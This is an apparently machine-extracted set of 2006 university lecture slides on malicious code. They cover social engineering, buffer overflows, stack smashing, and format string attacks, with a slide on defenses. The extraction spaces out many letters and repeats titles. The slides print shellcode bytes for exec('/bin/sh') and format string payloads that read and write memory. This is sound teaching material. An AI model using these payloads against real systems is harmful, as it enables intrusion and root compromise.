Malicious Code Malicious Code for Fun and Profit for Fun and Profit Mihai Christodorescu mihai@cs.wisc.edu 23 March 2006
What is Malicious Code? What is Malicious Code? Viruses, worms, trojans, … Code that breaks your security policy. Attack vector Characteristics Payload Spreading algorithm 23 March 2006 Mihai Christodorescu 2
Outline Outline • Attack Vectors • Payloads • Spreading Algorithms • Case Studies 23 March 2006 Mihai Christodorescu 3
Attack Vectors Attack Vectors • Social engineering “Make them want to run it.” • Vulnerability exploitation “Force your way into the system.” • Piggybacking “Make it run when other programs run.” 23 March 2006 Mihai Christodorescu 4
Social Engineering Social Engineering • Suggest to user that the executable is: – A game. – A desirable picture/movie. – An important document. – A security update from Microsoft. – A security update from the IT department. • Spoofing the sender helps. 23 March 2006 Mihai Christodorescu 5
Outline Outline • Attack Vectors: � Social Engineering � Vulnerability Exploitation � Piggybacking • Payloads • Spreading Algorithms • Case Studies 23 March 2006 Mihai Christodorescu 6
Vulnerability Exploitation Vulnerability Exploitation • Make use of flaws in software input handling. • Sample techniques: – Buffer overflow attacks. – Format string attacks. – Return-to-libc attacks. – SQL injection attacks. 23 March 2006 Mihai Christodorescu 7
Buffer Basic Principles Basic Principles Overflows A buffer overflow occurs when data is stored past the boundaries of an array or a string. The additional data now overwrites nearby program variables. Result: Attacker controls or takes over a currently running process. 23 March 2006 Mihai Christodorescu 8
Buffer Example Example Overflows Expected input: \ \ host nam e\ pat h voi d pr ocess_r equest pr ocess_r equest ( char * r eq ) { / / G et host nam e char host [ 20 ] ; i nt pos = f i nd_char ( r eq, ‘ \ \ ’ , 2 ) ; st r cpy( host , subst r ( r eq, 2, pos – 1 ) ) ; . . . pr ocess_r equest ( “ \ \ t ux12\ usr \ f oo. t xt ” ) ; ⇒ � O O K K r et ur n; ) ; ⇒ � BAD pr ocess_r equest ( “ \ \ aaabbbcccdddeeef f f ggghhh\ bar ” BAD } 23 March 2006 Mihai Christodorescu 9
Buffer Program Stack Program Stack Overflows A stack frame per procedure call. main() voi d pr ocess_r equest pr ocess_r equest ( char * r eq ) { process_request() / / G et host nam e char host [ 20 ] ; i nt pos = f i nd_char ( r eq, ‘ \ \ ’ , 2 ) ; st r cpy( host , subst r ( r eq, 2, pos – 1 ) ) ; . . . r et ur n; } strcpy() 23 March 2006 Mihai Christodorescu 10
Buffer Program Stack Program Stack Overflows A stack frame per procedure call. main() voi d pr ocess_r equest pr ocess_r equest ( char * r eq ) { process_request() / / G et host nam e char host [ 20 ] ; i nt pos = f i nd_char ( r eq, ‘ \ \ ’ , 2 ) ; st r cpy( host , subst r ( r eq, 2, pos – 1 ) ) ; . . . r et ur n; } strcpy() 23 March 2006 Mihai Christodorescu 11
Buffer Program Stack Program Stack Overflows A stack frame per procedure call. main() arg: req req voi d pr ocess_r equest pr ocess_r equest ( char * r eq ) { process_request() / / G et host nam e char host [ 20 ] ; i nt pos = f i nd_char ( r eq, ‘ \ \ ’ , 2 ) ; st r cpy( host , subst r ( r eq, 2, pos – 1 ) ) ; . . . r et ur n; } strcpy() 23 March 2006 Mihai Christodorescu 12
Buffer Program Stack Program Stack Overflows A stack frame per procedure call. main() arg: req req voi d pr ocess_r equest pr ocess_r equest ( char * r eq ) { return address process_request() / / G et host nam e frame pointer char host [ 20 ] ; i nt pos = f i nd_char ( r eq, ‘ \ \ ’ , 2 ) ; st r cpy( host , subst r ( r eq, 2, pos – 1 ) ) ; . . . r et ur n; } strcpy() 23 March 2006 Mihai Christodorescu 13
Buffer Program Stack Program Stack Overflows A stack frame per procedure call. main() arg: req req voi d pr ocess_r equest pr ocess_r equest ( char * r eq ) { return address process_request() / / G et host nam e frame pointer char host [ 20 ] ; i nt pos = f i nd_char ( r eq, ‘ \ \ ’ , 2 ) ; st r cpy( host , subst r ( r eq, 2, pos – 1 ) ) ; local: host host . . . r et ur n; } strcpy() 23 March 2006 Mihai Christodorescu 14
Buffer Program Stack Program Stack Overflows A stack frame per procedure call. main() arg: req req voi d pr ocess_r equest pr ocess_r equest ( char * r eq ) { return address process_request() / / G et host nam e frame pointer char host [ 20 ] ; i nt pos = f i nd_char ( r eq, ‘ \ \ ’ , 2 ) ; st r cpy( host , subst r ( r eq, 2, pos – 1 ) ) ; local: host host . . . r et ur n; } local: pos pos strcpy() 23 March 2006 Mihai Christodorescu 15
Buffer Normal Execution Normal Execution Overflows pr ocess_r equest ( “ \ \ t ux12\ usr \ f oo. t xt ” ) ; main() arg: req req voi d pr ocess_r equest pr ocess_r equest ( char * r eq ) { return address process_request() / / G et host nam e frame pointer char host [ 20 ] ; i nt pos = f i nd_char ( r eq, ‘ \ \ ’ , 2 ) ; st r cpy( host , subst r ( r eq, 2, pos – 1 ) ) ; local: host host . . . r et ur n; } local: pos pos 23 March 2006 Mihai Christodorescu 16
Buffer Normal Execution Normal Execution Overflows pr ocess_r equest ( “ \ \ t ux12\ usr \ f oo. t xt ” ) ; main() arg: req req voi d pr ocess_r equest pr ocess_r equest ( char * r eq ) { return address process_request() / / G et host nam e frame pointer char host [ 20 ] ; i nt pos = f i nd_char ( r eq, ‘ \ \ ’ , 2 ) ; st r cpy( host , subst r ( r eq, 2, pos – 1 ) ) ; local: host host . . . 2 \ 0 r et ur n; t u x 1 } local: pos pos 7 23 March 2006 Mihai Christodorescu 17
Buffer Overflow Execution Overflow Execution Overflows pr ocess_r equest ( “ \ \ aaabbbcccdddeeef f f ggghhhi i i j j j \ bar ” ) ; Characters that main() overwrite the arg: req req voi d pr ocess_r equest pr ocess_r equest ( char * r eq ) j j \ 0 return address. { return address i i i j process_request() / / G et host nam e frame pointer g h h h char host [ 20 ] ; i nt pos = f i nd_char ( r eq, ‘ \ \ ’ , 2 ) ; f f g g st r cpy( host , e e e f subst r ( r eq, 2, pos – 1 ) ) ; local: host host c d d d . . . b b c c r et ur n; a a a b } local: pos pos 32 32 23 March 2006 Mihai Christodorescu 18
Buffer Smashing the Stack Smashing the Stack Overflows The attacker gets one chance to gain control. Craft an input string such that: • The return address is overwritten with a pointer to malicious code. • The malicious code is placed inside the input string. Malicious code can create a root shell by executing “ / bi n/ sh ”. 23 March 2006 Mihai Christodorescu 19
Buffer Shell Code Shell Code Overflows EB 17 5E 89 76 08 31 C0 Code for exec(“/bin/sh”): 88 46 07 89 46 0C B0 0B m ov edx, ar g2 m ov ecx, ar g1 m ov ebx, “ / bi n/ sh” 89 F3 8D 4E 08 31 D2 CD m ov eax, 0Bh i nt 80h 80 E8 E4 FF FF FF / b i n / s h \ 0 ar g 2 ar g 2 ar g 1 poi nt er Pointer value for overwriting the return address. t o code 23 March 2006 Mihai Christodorescu 20
Buffer Thicker Armor Thicker Armor Overflows • Defense against stack-smashing attacks: – Bounds-checking. – Protection libraries. – Non-executable stack. – setuid()/chroot(). – Avoid running programs as root! – Address randomization. – Behavioral monitoring. 23 March 2006 Mihai Christodorescu 21
More Info More Info “Smashing the Stack for Fun and Profit” by Aleph One StackGuard , RAD , PAX , ASLR CERT 23 March 2006 Mihai Christodorescu 22
Format Format String Attacks Format String Attacks Strings • Another way to illegally control program values. • Uses flaws in the design of pr i nt f ( ) pr i nt f ( ) : pr i nt f ( “ % pr i nt f ( “ % s: % s: % d” , s, x ) ; d” , s, x ) ; 23 March 2006 Mihai Christodorescu 23
Format ( ) Operation Operation Strings pr i nt f pr i nt f ( ) ( ) pr i nt f pr i nt f ( ) foo() y x pr i nt f ( “ % pr i nt f ( “ % s: % s: % d, % d, % x” , x” , s s, x, y ) ; s, x, y ) ; format string ptr printf() 23 March 2006 Mihai Christodorescu 24
Format Attack 1: Read Any Value Attack 1: Read Any Value Strings secret key ptr What the code says: pr i nt f ( st r pr i nt f ( st r ) ; What the programmer meant: format string ptr pr i nt f ( “ % pr i nt f ( “ % s” , st r s” , st r ) ; If str = “ % s ” % x% x% x% x% x% x% x% x% s 23 March 2006 Mihai Christodorescu 25
Format Attack 2: Write to Address Attack 2: Write to Address Strings 4 return address What the code says: pr i nt f ( st r pr i nt f ( st r ) ; format string ptr If str = “ % n ” % x% x% x% x% x% x% x% x% n 23 March 2006 Mihai Christodorescu 26
Format Defenses Defenses Strings Never use pr i nt f ( ) pr i nt f ( ) without a format string! FormatGuard. 23 March 2006 Mihai Christodorescu 27
Recommend
More recommend